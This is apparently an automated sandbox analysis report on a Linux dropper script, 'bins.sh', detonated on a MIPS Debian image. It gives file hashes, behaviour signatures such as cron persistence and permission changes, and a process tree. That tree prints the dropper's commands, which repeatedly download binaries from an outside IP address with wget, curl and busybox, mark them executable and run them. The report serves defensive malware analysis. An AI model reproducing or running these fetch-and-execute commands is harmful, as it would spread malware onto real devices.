Analysis

  • max time kernel
    151s
  • max time network
    144s
  • platform
    debian-9_mipsel
  • resource
    debian9-mipsel-20240226-en
  • resource tags

    arch:mipselimage:debian9-mipsel-20240226-enkernel:4.9.0-13-4kc-maltalocale:en-usos:debian-9-mipselsystem
  • submitted
    28-10-2024 12:47

General

  • Target

    bins.sh

  • Size

    10KB

  • MD5

    3da3ce71a18fc5d80d9044a4933d27f1

  • SHA1

    a5eef453c7a93891070ca8d3ff35000471f51b53

  • SHA256

    3e70a576a102f9254fdd6193396f16e2f00fbcbbd7164e9c4c799c7d4051e235

  • SHA512

    bf3b38383df1933f055422edb7a70dd4b92211aac8bfb1c072334757f2a62b035cf81b3734117f10e55b05f711df5beb573043552826938a956a6f1e2d63c01b

  • SSDEEP

    192:+muL6mtfnT4FrqarsYqScePT4FthePmuL6minT4tqarsYvPT4FtmD:mfnT4FEScePT4FtheMnT4/PT4FtmD

Malware Config

Signatures

  • File and Directory Permissions Modification 1 TTPs 6 IoCs

    Adversaries may modify file or directory permissions to evade defenses.

  • Executes dropped EXE 6 IoCs
  • Renames itself 1 IoCs
  • Creates/modifies Cron job 1 TTPs 1 IoCs

    Cron allows running tasks on a schedule, and is commonly used for malware persistence.

  • Enumerates running processes

    Discovers information about currently running processes on the system

  • Reads runtime system information 64 IoCs

    Reads data from /proc virtual filesystem.

  • System Network Configuration Discovery 1 TTPs 5 IoCs

    Adversaries may gather information about the network configuration of a system.

  • Writes file to tmp directory 17 IoCs

    Malware often drops required files in the /tmp directory.

Processes

  • /tmp/bins.sh
    /tmp/bins.sh
    1⤵
      PID:707
      • /bin/rm
        /bin/rm bins.sh
        2⤵
          PID:712
        • /usr/bin/wget
          wget http://87.120.84.230/bins/FILNaF3tSiSKuBUJ6BUfylL7MXCefU0NNZ
          2⤵
          • Writes file to tmp directory
          PID:718
        • /usr/bin/curl
          curl -O http://87.120.84.230/bins/FILNaF3tSiSKuBUJ6BUfylL7MXCefU0NNZ
          2⤵
          • Reads runtime system information
          • Writes file to tmp directory
          PID:728
        • /bin/busybox
          /bin/busybox wget http://87.120.84.230/bins/FILNaF3tSiSKuBUJ6BUfylL7MXCefU0NNZ
          2⤵
          • Writes file to tmp directory
          PID:738
        • /bin/chmod
          chmod 777 FILNaF3tSiSKuBUJ6BUfylL7MXCefU0NNZ
          2⤵
          • File and Directory Permissions Modification
          PID:739
        • /tmp/FILNaF3tSiSKuBUJ6BUfylL7MXCefU0NNZ
          ./FILNaF3tSiSKuBUJ6BUfylL7MXCefU0NNZ
          2⤵
          • Executes dropped EXE
          PID:740
        • /bin/rm
          rm FILNaF3tSiSKuBUJ6BUfylL7MXCefU0NNZ
          2⤵
            PID:743
          • /usr/bin/wget
            wget http://87.120.84.230/bins/3vx7AHejcM01ihIvuDxBKXL5i6fCsCJYaz
            2⤵
            • Writes file to tmp directory
            PID:744
          • /usr/bin/curl
            curl -O http://87.120.84.230/bins/3vx7AHejcM01ihIvuDxBKXL5i6fCsCJYaz
            2⤵
            • Reads runtime system information
            • Writes file to tmp directory
            PID:745
          • /bin/busybox
            /bin/busybox wget http://87.120.84.230/bins/3vx7AHejcM01ihIvuDxBKXL5i6fCsCJYaz
            2⤵
            • Writes file to tmp directory
            PID:746
          • /bin/chmod
            chmod 777 3vx7AHejcM01ihIvuDxBKXL5i6fCsCJYaz
            2⤵
            • File and Directory Permissions Modification
            PID:747
          • /tmp/3vx7AHejcM01ihIvuDxBKXL5i6fCsCJYaz
            ./3vx7AHejcM01ihIvuDxBKXL5i6fCsCJYaz
            2⤵
            • Executes dropped EXE
            PID:748
          • /bin/rm
            rm 3vx7AHejcM01ihIvuDxBKXL5i6fCsCJYaz
            2⤵
              PID:750
            • /usr/bin/wget
              wget http://87.120.84.230/bins/pAuq8idvm5kSFSBPMWwHVOKs00TryJXt5V
              2⤵
              • Writes file to tmp directory
              PID:751
            • /usr/bin/curl
              curl -O http://87.120.84.230/bins/pAuq8idvm5kSFSBPMWwHVOKs00TryJXt5V
              2⤵
              • Writes file to tmp directory
              PID:752
            • /bin/busybox
              /bin/busybox wget http://87.120.84.230/bins/pAuq8idvm5kSFSBPMWwHVOKs00TryJXt5V
              2⤵
              • Writes file to tmp directory
              PID:756
            • /bin/chmod
              chmod 777 pAuq8idvm5kSFSBPMWwHVOKs00TryJXt5V
              2⤵
              • File and Directory Permissions Modification
              PID:759
            • /tmp/pAuq8idvm5kSFSBPMWwHVOKs00TryJXt5V
              ./pAuq8idvm5kSFSBPMWwHVOKs00TryJXt5V
              2⤵
              • Executes dropped EXE
              PID:761
            • /bin/rm
              rm pAuq8idvm5kSFSBPMWwHVOKs00TryJXt5V
              2⤵
                PID:764
              • /usr/bin/wget
                wget http://87.120.84.230/bins/THYbHd0dEWOpmo5G60FqVHaXh6ZBWhfYV6
                2⤵
                • Writes file to tmp directory
                PID:765
              • /usr/bin/curl
                curl -O http://87.120.84.230/bins/THYbHd0dEWOpmo5G60FqVHaXh6ZBWhfYV6
                2⤵
                • Writes file to tmp directory
                PID:772
              • /bin/busybox
                /bin/busybox wget http://87.120.84.230/bins/THYbHd0dEWOpmo5G60FqVHaXh6ZBWhfYV6
                2⤵
                • Writes file to tmp directory
                PID:781
              • /bin/chmod
                chmod 777 THYbHd0dEWOpmo5G60FqVHaXh6ZBWhfYV6
                2⤵
                • File and Directory Permissions Modification
                PID:784
              • /tmp/THYbHd0dEWOpmo5G60FqVHaXh6ZBWhfYV6
                ./THYbHd0dEWOpmo5G60FqVHaXh6ZBWhfYV6
                2⤵
                • Executes dropped EXE
                PID:785
              • /bin/rm
                rm THYbHd0dEWOpmo5G60FqVHaXh6ZBWhfYV6
                2⤵
                  PID:789
                • /usr/bin/wget
                  wget http://87.120.84.230/bins/frBhUnyif1LdwbT0Ifqa8LQAXHs8o5uZQt
                  2⤵
                  • Writes file to tmp directory
                  PID:790
                • /usr/bin/curl
                  curl -O http://87.120.84.230/bins/frBhUnyif1LdwbT0Ifqa8LQAXHs8o5uZQt
                  2⤵
                  • Reads runtime system information
                  • Writes file to tmp directory
                  PID:797
                • /bin/busybox
                  /bin/busybox wget http://87.120.84.230/bins/frBhUnyif1LdwbT0Ifqa8LQAXHs8o5uZQt
                  2⤵
                  • Writes file to tmp directory
                  PID:813
                • /bin/chmod
                  chmod 777 frBhUnyif1LdwbT0Ifqa8LQAXHs8o5uZQt
                  2⤵
                  • File and Directory Permissions Modification
                  PID:816
                • /tmp/frBhUnyif1LdwbT0Ifqa8LQAXHs8o5uZQt
                  ./frBhUnyif1LdwbT0Ifqa8LQAXHs8o5uZQt
                  2⤵
                  • Executes dropped EXE
                  • Renames itself
                  • Reads runtime system information
                  PID:817
                  • /bin/sh
                    sh -c "crontab -l"
                    3⤵
                      PID:819
                      • /usr/bin/crontab
                        crontab -l
                        4⤵
                        • Reads runtime system information
                        PID:820
                    • /bin/sh
                      sh -c "crontab -"
                      3⤵
                        PID:821
                        • /usr/bin/crontab
                          crontab -
                          4⤵
                          • Creates/modifies Cron job
                          PID:826
                    • /bin/rm
                      rm frBhUnyif1LdwbT0Ifqa8LQAXHs8o5uZQt
                      2⤵
                        PID:823
                      • /usr/bin/wget
                        wget http://87.120.84.230/bins/S5SaggO1HlTxUfIPrUqvj3KLIRCKXpOtdg
                        2⤵
                        • System Network Configuration Discovery
                        PID:828
                      • /usr/bin/curl
                        curl -O http://87.120.84.230/bins/S5SaggO1HlTxUfIPrUqvj3KLIRCKXpOtdg
                        2⤵
                        • System Network Configuration Discovery
                        PID:829
                      • /bin/busybox
                        /bin/busybox wget http://87.120.84.230/bins/S5SaggO1HlTxUfIPrUqvj3KLIRCKXpOtdg
                        2⤵
                        • System Network Configuration Discovery
                        • Writes file to tmp directory
                        PID:830
                      • /bin/chmod
                        chmod 777 S5SaggO1HlTxUfIPrUqvj3KLIRCKXpOtdg
                        2⤵
                        • File and Directory Permissions Modification
                        PID:831
                      • /tmp/S5SaggO1HlTxUfIPrUqvj3KLIRCKXpOtdg
                        ./S5SaggO1HlTxUfIPrUqvj3KLIRCKXpOtdg
                        2⤵
                        • Executes dropped EXE
                        • System Network Configuration Discovery
                        PID:832
                      • /bin/rm
                        rm S5SaggO1HlTxUfIPrUqvj3KLIRCKXpOtdg
                        2⤵
                        • System Network Configuration Discovery
                        PID:834
                      • /usr/bin/wget
                        wget http://87.120.84.230/bins/b0fub1exe39oIXuIQJ3NrXKbyALTHxiOVY
                        2⤵
                          PID:835
                        • /usr/bin/curl
                          curl -O http://87.120.84.230/bins/b0fub1exe39oIXuIQJ3NrXKbyALTHxiOVY
                          2⤵
                            PID:836
                          • /bin/busybox
                            /bin/busybox wget http://87.120.84.230/bins/b0fub1exe39oIXuIQJ3NrXKbyALTHxiOVY
                            2⤵
                            • Writes file to tmp directory
                            PID:837

                        Network

                        MITRE ATT&CK Enterprise v15

                        Replay Monitor

                        Loading Replay Monitor...

                        Downloads

                        • /tmp/3vx7AHejcM01ihIvuDxBKXL5i6fCsCJYaz

                          Filesize

                          93KB

                          MD5

                          8fad5e89ce3d2b6159ac2ce2fdf7c084

                          SHA1

                          27105a304b9bb7cd8a663d1b4da1d92fd8eea355

                          SHA256

                          24689f385c263c42a28dd1498049171abc633faf91b5df2a738a81145d929bd6

                          SHA512

                          71689ade77c0ad2ca2db18ed4fd437b6a053b002efadbf6fb479e4f5c85a7830dc0e9cbfef877ca7a91c735a68f28226e7c813c05b329c23668de7edbc99f4bc

                        • /tmp/FILNaF3tSiSKuBUJ6BUfylL7MXCefU0NNZ

                          Filesize

                          129KB

                          MD5

                          54bec959d900ad930dc662f8092da57d

                          SHA1

                          9ae7ad9018eeac5aa89bcde68ec683a364ac7d55

                          SHA256

                          b62a7cb65dda1cb1ae995b13b62d20289f43b7bc560211484cfdc98c0d9b5f12

                          SHA512

                          904a52a1d41d442da07333f9835bb0b1bfcefe9790a566d3b8e03d62e0c788d10b0e17b05865798b1817615b3adb07adfcb13452d96aacf5995b66fae617db40

                        • /tmp/S5SaggO1HlTxUfIPrUqvj3KLIRCKXpOtdg

                          Filesize

                          101KB

                          MD5

                          a7e686eb3f74b104a5520f08cfd54eb5

                          SHA1

                          58b5d9571c85c6a7efc4e57111c3b8e2b2c9bb6b

                          SHA256

                          617734b61c7e230a72fba8cb8b361bda96cc2d8f40ee358c44a60f1d9b48ab07

                          SHA512

                          2767d9a7f71319334578015b133474217901747a6e21b0cdc2d591205c2862220e1730bbcee86ff372b2f2261e25bb64d021f9826ce9332d037b5db1c2ea68df

                        • /tmp/THYbHd0dEWOpmo5G60FqVHaXh6ZBWhfYV6

                          Filesize

                          108KB

                          MD5

                          c97a9c55ddb153e8bfce38f201d2cffb

                          SHA1

                          3970452f27327f98c2e3fdcabf0390067b48bd62

                          SHA256

                          138a80e023ab0bbb8b2259cf3633c94c39e6f68df2be2ad01ef08590249e662c

                          SHA512

                          1734a2e256f90d99d73c70d0faa5b3d24d39a2e9a60dec0c138e75ae0e1793edafb408e1f2aaa2692f40265183faea1d4141b271fb67543633a412817f9fd11e

                        • /tmp/b0fub1exe39oIXuIQJ3NrXKbyALTHxiOVY

                          Filesize

                          82KB

                          MD5

                          38ecff994b0bf0ae0fe1da3bf43f702d

                          SHA1

                          5441e18669794a7d3eb5bda3dfa9a9f145e77991

                          SHA256

                          c12a06fc16e0961fdcb5b0eb86516d9bb8a03cb4a78db7635ddbc1a2b8923861

                          SHA512

                          92d4214a11082f28198b60c42320cfe2e353a1f205d96b9744aa054710f0364521e695e549d4d401f23423f7b5b127c6d58e06b308554ff78a7d371fd59c50e5

                        • /tmp/frBhUnyif1LdwbT0Ifqa8LQAXHs8o5uZQt

                          Filesize

                          129KB

                          MD5

                          52f72bcf31899453b40d37a7cbf55f35

                          SHA1

                          6dfca1bd70aad3e88713b02ec1669ba5a792456c

                          SHA256

                          ed7e61403d47c0319eea05db0cba4d17bfb1594621d6722bfe43cffecacdf495

                          SHA512

                          be8b5d14afe30f1ce2f474a20af599a93c3a7543ec301554dd2ffa0225c945d91c3354d777f09ee886a90acfa8ecfa24533de9cf3bcf5f59a44d53ca3c73e967

                        • /tmp/pAuq8idvm5kSFSBPMWwHVOKs00TryJXt5V

                          Filesize

                          122KB

                          MD5

                          aadb8cc4b6eac7fce760c09262693884

                          SHA1

                          b55178ff3605f4bbfc9286d4c8ac445673232217

                          SHA256

                          b254f9a6df1e7aae5181abf014b9d574c959ab71bdfd3a2b21022446c583d843

                          SHA512

                          5567998215fc9389efeb34ee57e59db4141044bbb1f06cac365565681226836b515c8c8cc17931e72e71d4240a5f433aebb8dfe67b2463ef800f59c86561a62c

                        • /var/spool/cron/crontabs/tmp.wVyiPj

                          Filesize

                          210B

                          MD5

                          d2e7739e9182d605945e1956b471cb79

                          SHA1

                          7e8c5a0f30d1bb6658b461ec4c2de1133156ae86

                          SHA256

                          cba6d21ed6f7abdcfb28680efc195850e4acc514f4cf5cf92f0345078a669f95

                          SHA512

                          8ab002d25c59b5682e24a3443080aceb2fc79159c834d4c5fd9f2f36baf314980be3861f816375188c3d334e1d93effa1b78b2b532f924c4b67af77997650fe0